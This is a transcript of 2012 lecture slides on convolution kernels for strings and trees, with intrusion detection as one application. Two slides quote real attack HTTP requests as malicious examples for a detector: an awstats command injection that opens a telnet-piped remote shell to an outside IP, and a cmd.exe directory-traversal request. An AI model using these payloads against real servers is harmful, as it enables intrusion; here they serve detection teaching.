lecture 9 kernel methods for structured inputs...applying the subset product kernel theorem for a =...

50
Lecture 9 Kernel Methods for Structured Inputs Pavel Laskov 1 Blaine Nelson 1 1 Cognitive Systems Group Wilhelm Schickard Institute for Computer Science Universit¨ at T¨ ubingen, Germany Advanced Topics in Machine Learning, 2012 P. Laskov and B. Nelson (T¨ ubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 1 / 30

Upload: others

Post on 10-May-2020

6 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Lecture 9Kernel Methods for Structured Inputs

Pavel Laskov1 Blaine Nelson1

1Cognitive Systems Group

Wilhelm Schickard Institute for Computer Science

Universitat Tubingen, Germany

Advanced Topics in Machine Learning, 2012

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 1 / 30

Page 2: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

What We Have Learned So Far

r ∗

∗c∗

Learning problems are defined in terms of kernel functions reflecting thegeometry of training data.

What if the data does not naturally belong to inner product spaces?

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 2 / 30

Page 3: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Example: Intrusion Detection

> GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d

\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel

Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de\x0d\x0a\x0d\x0a

> GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%

20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo| HTTP/1.1\x0d\x0aAccept: */*\x0d\x0a

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a

> GET /Images/200606/tscreen2.gif HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0a

Cookie: .ASPXANONYMOUS=AcaruKtUwo5mMjliZjIxZC1kYzI1LTQyYzQtYTMyNy03YWI2MjlkMjhiZGQ1; CommunityServer-UserCookie1001=lv=5/16/2006 12:

27:01 PM&mra=5/17/2006 9:02:37 AM\x0d\x0aUser-Agent: Mozilla/5.0(Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost

: www.thedailywtf.com\x0d\x0a\x0d\x0a

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 3 / 30

Page 4: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Examples of Structured Input Data

Histograms

TreesS

VP

Jeff

V

ate

NP

D

the apple

N

N

NP1.

2.

3.

4. 5.

S

VP

John

V

hit

NP

D

the red

A

car

N

NP

N

1.

2.

3.

4. 5.

Strings

Graphs

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 4 / 30

Page 5: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Convolution Kernels in a Nutshell

Decompose structured objects into comparable parts.

Aggregate the values of similarity measures for individual parts.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 5 / 30

Page 6: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

R-Convolution

Let X be a set of composite objects (e.g., cars), and X1, . . . , XD be setsof parts (e.g., wheels, brakes, etc.). All sets are assumed countable.

Let R denote the relation “being part of”:

R(x1, . . . , xD , x) = 1, iff x1, . . . , xD are parts of x

The inverse relation R−1 is defined as:

R−1(x) = {x : R(x, x) = 1}

In other words, for each object x , R−1(x) is a set of component subsets,that are part of x .

We say that R is finite, if R−1 is finite for all x ∈ X .

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 6 / 30

Page 7: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

R-Convolution: A Naive Example

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 7 / 30

Page 8: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

R-Convolution: A Naive Example

wheels

headlights

bumpers

transmission

differential

tow coupling

...

Alfa Romeo Junior Lada Niva

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 7 / 30

Page 9: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

R-Convolution: Further Examples

Let x be a D-tuple in X = X1 × . . . × XD . Let each of the Dcomponents of x ∈ X be a part of x . Then R(x, x) = 1 iff x = x .

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 8 / 30

Page 10: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

R-Convolution: Further Examples

Let x be a D-tuple in X = X1 × . . . × XD . Let each of the Dcomponents of x ∈ X be a part of x . Then R(x, x) = 1 iff x = x .

Let X1 = X2 = X be sets of all finite strings over a finite alphabet.Define R(x1, x2, x) = 1 iff x = x1 ◦ x2, i.e. concatenation of x1 and x2.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 8 / 30

Page 11: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

R-Convolution: Further Examples

Let x be a D-tuple in X = X1 × . . . × XD . Let each of the Dcomponents of x ∈ X be a part of x . Then R(x, x) = 1 iff x = x .

Let X1 = X2 = X be sets of all finite strings over a finite alphabet.Define R(x1, x2, x) = 1 iff x = x1 ◦ x2, i.e. concatenation of x1 and x2.

Let X1 = . . . = XD = X be a set of D-degree ordered and rooted trees.Define R(x, x) = 1 iff x1, . . . , xD are D subtrees of the root of x ∈ X .

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 8 / 30

Page 12: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

R-Convolution Kernel

Definition

Let x , y ∈ X and x and y be the corresponding sets of parts. LetKd (xd , yd ) be a kernel between the d -th parts of x and y (1 ≤ d ≤ D).Then the convolution kernel between x and y is defined as:

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

D∏

d=1

Kd (xd , yd )

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 9 / 30

Page 13: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Examples of R-Convolution Kernels

RBF kernel is a convolution kernel. Let each of the D dimensions of xbe a part, and Kd(xd , yd ) = e−(xd−yd)

2/2σ2. Then

K (x , y) =

D∏

d=1

e−(xd−yd )2/2σ2

= e−∑D

d=1(xd−yd)2/2σ2

= e−||x−y||2

2σ2

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 10 / 30

Page 14: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Examples of R-Convolution Kernels

RBF kernel is a convolution kernel. Let each of the D dimensions of xbe a part, and Kd(xd , yd ) = e−(xd−yd)

2/2σ2. Then

K (x , y) =

D∏

d=1

e−(xd−yd )2/2σ2

= e−∑D

d=1(xd−yd)2/2σ2

= e−||x−y||2

2σ2

Linear kernel K (x , y) =∑D

d=1 xdyd is not a convolution kernel, exceptfor the trivial “single part” decomposition. For any other decomposition,we would need to sum products of more than one term, whichcontradicts the formula for the linear kernel.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 10 / 30

Page 15: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Subset Product Kernel

Theorem

Let K be a kernel on a set U × U. The for all finite, non-empty subsetsA,B ⊆ U,

K ′(A,B) =∑

x∈A

y∈B

K (x , y)

is a valid kernel.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 11 / 30

Page 16: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Subset Product Kernel

Proof.

Goal: show that K ′(A,B) is an inner product in some space...

Recall that for any point u ∈ U, K (u, ·) is a function Ku in some RKHSH. Let fA =

u∈A Ku, fB =∑

u∈B Ku . Define

〈fA, fB〉 :=∑

x∈A

y∈B

K (x , y)

We need to show that it satisfies properties of an inner product... LetfC =

u∈C Ku . Clearly,

〈fA + fC , fB〉 =∑

x∈A∪C

y∈B

K (x , y) =∑

x∈A

y∈B

K (x , y) +∑

x∈C

y∈B

K (x , y)

Other properties of the inner product can be proved similarly.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 11 / 30

Page 17: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Back to the R-Convolution Kernel

Theorem

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

D∏

d=1

Kd (xd , yd )

is a valid kernel.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 12 / 30

Page 18: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Back to the R-Convolution Kernel

Proof.

Let U = X1 × . . .× XD . From the closure of kernels under the tensorproduct, it follows that

K (x, y) =

D∏

d=1

Kd (xd , yd )

is a kernel on U × U. Applying the Subset Product Kernel Theorem forA = R−1(x), B = R−1(y), the theorem’s claim follows.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 12 / 30

Page 19: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

End of Theory ,

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 13 / 30

Page 20: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Convolution Kernels for Strings

Let x , y ∈ A∗ be two strings generated from the alphabet A. How can wedefine K (x , y) using the ideas of convolution kernels?

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 14 / 30

Page 21: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Convolution Kernels for Strings

Let x , y ∈ A∗ be two strings generated from the alphabet A. How can wedefine K (x , y) using the ideas of convolution kernels?

Let D = 1, take X1 to be the set of all possible strings of length n(“n-grams”) generated from the alphabet A. |X1| = |A|n.

For any x ∈ A∗ and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x .

Then R−1(x) is a set of all n-grams contained in x .

Define K (x , y) = 1[x=y ].

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 14 / 30

Page 22: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Convolution Kernels for Strings

Let x , y ∈ A∗ be two strings generated from the alphabet A. How can wedefine K (x , y) using the ideas of convolution kernels?

Let D = 1, take X1 to be the set of all possible strings of length n(“n-grams”) generated from the alphabet A. |X1| = |A|n.

For any x ∈ A∗ and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x .

Then R−1(x) is a set of all n-grams contained in x .

Define K (x , y) = 1[x=y ].

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

1[x=y ]

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 14 / 30

Page 23: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Convolution Kernels for Strings (ctd.)

An alternative definition of a kernel for two strings can be obtained asfollows:

Let D = 1, take X1 to be the set of all possible strings of arbitrarylength generated from the alphabet A. |X1| = ∞.

For any x ∈ A∗ and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x .

Then R−1(x) is a set of all n-grams contained in x .

Define K (x , y) = 1[x=y ].

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

1[x=y ]

Notice that the size of the summation remains finite despite the infinitedimensionality of X1.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 15 / 30

Page 24: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Geometry of String Kernels

Sequences

1. blabla blubla blablabu aa

2. bla blablaa bulab bb abla

3. a blabla blabla ablub bla

4. blab blab abba blabla blu

Geometry

1

2 3

4

Subsequences

Features

Histograms of subsequencesa b aa

bb

bla

blu

ab

ba

ab

la

bla

b

ab

lub

bu

lab

bla

bla

bla

blu

bla

bla

a

bla

bla

bu

1.

2.

3.

4.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 16 / 30

Page 25: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Metric Embedding of Strings

Define the language S ⊆ A∗ of possiblefeatures, e.g., n-grams, words, allsubsequences.

For each sequence x , count occurrences ofeach feature in it:

φ : x −→ (φs(x))s∈S

Use φs(x) as the s-th coordinate of x in thevector space of dimensionality |S |.

Define K (x , y) := 〈φs(x), φs (y)〉. This is equivalent to K (x , y) definedby the convolution kernel!

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 17 / 30

Page 26: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Similarity Measure for Embedded Strings

Metric embedding enables application of various vectorial similaritymeasures over sequences, e.g.

Kernels K (x , y)

Linear∑

s∈S

φs(x)φs(y)

RBF exp(d(x , y)2/σ)

Similarity coefficients

Jaccard, Kulczynski, . . .

Distances d(x , y)

Manhattan∑

s∈S

|φs(x)− φs(y)|

Minkowski k

s∈S

|φs(x) − φs(y)|k

Hamming∑

s∈S

sgn |φs(x) − φs(y)|

Chebyshev maxs∈S

|φs(x) − φs(y)|

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 18 / 30

Page 27: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Embedding example

X = abrakadabraY = barakobama

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 19 / 30

Page 28: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Embedding example

X = abrakadabraY = barakobama

X Y X · Y

a/5 a/4 20

b/2 b/2 4

d/1

k/1 k/1 1

m/1

o/1

r/2 r/1 2

5.92 4.90 27

∠XY = 21.5◦

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 19 / 30

Page 29: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Embedding example

X = abrakadabraY = barakobama

X Y X · Y

a/5 a/4 20

b/2 b/2 4

d/1

k/1 k/1 1

m/1

o/1

r/2 r/1 2

5.92 4.90 27

∠XY = 21.5◦

X Y X · Y

ab/2

ad/1

ak/1 ak/1 1

am/1

ar/1

ba/2

br/2

da/1

ka/1

ko/1

ma/1

ob/1

ra/2 ra/1 2

4.00 3.46 3

∠XY = 77.5◦

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 19 / 30

Page 30: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Implementation of String Kernels

General observations

Embedding space has huge dimensionality but is very sparse; at mostlinear number of entries are different from zero in each sample.

Computation of similarity measures requires operations on either theintersection or the union of the set of non-zero features in each sample.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 20 / 30

Page 31: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Implementation of String Kernels

General observations

Embedding space has huge dimensionality but is very sparse; at mostlinear number of entries are different from zero in each sample.

Computation of similarity measures requires operations on either theintersection or the union of the set of non-zero features in each sample.

Implementation strategies

Explicit but sparse representation of feature vectors

⇒ sorted arrays or hash tables

Implicit and general representations

⇒ tries, suffix trees, suffix arrays

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 20 / 30

Page 32: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

String Kernels using Sorted Arrays

Store all features in sorted arrays

Traverse feature arrays of two samples to find mathing elements

φ(x)

φ(z)

aa (3)

ab (3)

ab (2)

ba (2)

bc (2)

bb (1)

cc (1)

bc (4)

Running time:

Sorting: O(n)Comparison: O(n)

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 21 / 30

Page 33: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

String Kernels using Generalized Suffix Trees

2-grams “abbaa” “baaaa”

aa

ab

ba

bb

“abbaa” · “baaaa” = 0

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 22 / 30

Page 34: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

String Kernels using Generalized Suffix Trees

2-grams “abbaa” “baaaa”

aa 1 3

ab

ba

bb

“abbaa” · “baaaa” = 3

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 22 / 30

Page 35: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

String Kernels using Generalized Suffix Trees

2-grams “abbaa” “baaaa”

aa 1 3

ab 1 0

ba

bb

“abbaa” · “baaaa” = 3

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 22 / 30

Page 36: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

String Kernels using Generalized Suffix Trees

2-grams “abbaa” “baaaa”

aa 1 3

ab 1 0

ba 1 1

bb

“abbaa” · “baaaa” = 4

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 22 / 30

Page 37: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

String Kernels using Generalized Suffix Trees

2-grams “abbaa” “baaaa”

aa 1 3

ab 1 0

ba 1 1

bb 1 0

“abbaa” · “baaaa” = 4

a # $ b

a # $ bbaa# aa baa#

a # $ aa$ #

a$ $

6 6

3 4 2 1

1 3 1 1

0 2

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 22 / 30

Page 38: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Tree Kernels: Motivation

Trees are ubiquitous representations in various applications:

Parsing: parse treesContent representation: XML, DOMBioinformatics: philogeny

Ad-hoc features related to trees, e.g. number of nodes or edges, are notinformative for learning

Structural properties of trees, on the other hand, may be verydiscriminative

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 23 / 30

Page 39: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Example: Normal HTTP Request

GET /test.gif HTTP/1.1<NL> Accept: */*<NL> Accept-Language: en<NL>

Referer: http://host/<NL> Connection: keep-alive<NL>

<httpSession>

<request>

<method>

GET

<uri>

<path>

/test.gif

<version>

HTTP/1.1

<reqhdr>

<hdr>1

<hdrkey>

Accept:

<hdrval>

*/*

<hdr>2

<hdrkey>

Referer:

<hdrval>

http://host

<hdr>3

<hdrkey>

Connection:

<hdrval>

keep-alive

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 24 / 30

Page 40: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Example: Malicious HTTP Request

GET /scripts/..%%35c../cmd.exe?/c+dir+c:\ HTTP/1.0

<httpSession>

<request>

<method>

GET

<uri>

<path>

/scripts/..%%35c../.../cmd.exe?

<getparamlist>

<getparam>

<getkey>

/c+dir+c:\

<version>

HTTP/1.0

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 25 / 30

Page 41: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Convolution Kernels for Trees

Similar to strings, we can define kernels for trees using the convolutionkernel framework:

Let D = 1, X1 = X be sets of all trees. |X1| = |X | = ∞.

For any x ∈ X and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x

⇒ x is a subtree of x

Then R−1(x) is a set of all subtrees contained in x .

Define K (x , y) = 1[x=y ].

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

1[x=y ]

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 26 / 30

Page 42: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Convolution Kernels for Trees

Similar to strings, we can define kernels for trees using the convolutionkernel framework:

Let D = 1, X1 = X be sets of all trees. |X1| = |X | = ∞.

For any x ∈ X and any x ∈ X1, define R(x , x) = 1 iff x ⊆ x

⇒ x is a subtree of x

Then R−1(x) is a set of all subtrees contained in x .

Define K (x , y) = 1[x=y ].

K (x , y) =∑

x∈R−1(x)

y∈R−1(y)

1[x=y ]

/ Problem: Testing for equality between two trees may be extremelycostly!

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 26 / 30

Page 43: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Recursive Computation of Tree Kernels

Two useful facts:

Transitivity of a subtree relationship: x ⊆ x & x ⊆ x ⇒ x ⊆ x

Necessary condition for equality: two trees are equal only if all of theirsubtrees are equal.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 27 / 30

Page 44: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Recursive Computation of Tree Kernels

Two useful facts:

Transitivity of a subtree relationship: x ⊆ x & x ⊆ x ⇒ x ⊆ x

Necessary condition for equality: two trees are equal only if all of theirsubtrees are equal.

Recursive scheme

Let Ch(x) denote the set of immediate children of the root of (sub)tree x .|x | := |Ch(x)|.

If Ch(x) 6= Ch(y ) return 0.

If |x | = |y |, return 1.

Otherwise return

K (x , y) =

|x|∏

i=1

(1 + K (xi , yi))

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 27 / 30

Page 45: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Computation of Recursive Clause

Find a pair of nodes with identical subsets of children.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 28 / 30

Page 46: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Computation of Recursive Clause

Find a pair of nodes with identical subsets of children.

Add one for the nodes themselves (subtrees of cardinality 1).

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 28 / 30

Page 47: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Computation of Recursive Clause

Find a pair of nodes with identical subsets of children.

Add one for the nodes themselves (subtrees of cardinality 1).

Add counts for all mathing subtrees.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 28 / 30

Page 48: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Computation of Recursive Clause

Find a pair of nodes with identical subsets of children.

Add one for the nodes themselves (subtrees of cardinality 1).

Add counts for all mathing subtrees.

Multiply together and return the total count.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 28 / 30

Page 49: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Summary

Kernels for structured data extend learning methods to a vast variety ofpractical data types.

A generic framework for handling structured data is offered byconvolution kernels.

Special data structures and algorithms are needed for efficiency.

Extensive range of applications:

natural language processingbioinformaticscomputer security

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 29 / 30

Page 50: Lecture 9 Kernel Methods for Structured Inputs...Applying the Subset Product Kernel Theorem for A = R −1 (x), B = R −1 (y), the theorem’s claim follows. P. Laskov and B. Nelson

Bibliography I

[1] M. Collins and N. Duffy. Convolution kernel for natural language. InAdvances in Neural Information Proccessing Systems (NIPS), volume 16,pages 625–632, 2002.

[2] D. Haussler. Convolution kernels on discrete structures. Technical ReportUCSC-CRL-99-10, UC Santa Cruz, July 1999.

[3] K. Rieck and P. Laskov. Linear-time computation of similarity measures forsequential data. Journal of Machine Learning Research, 9:23–48, 2008.

P. Laskov and B. Nelson (Tubingen) Lecture 9: Learning with Structured Inputs July 3, 2012 30 / 30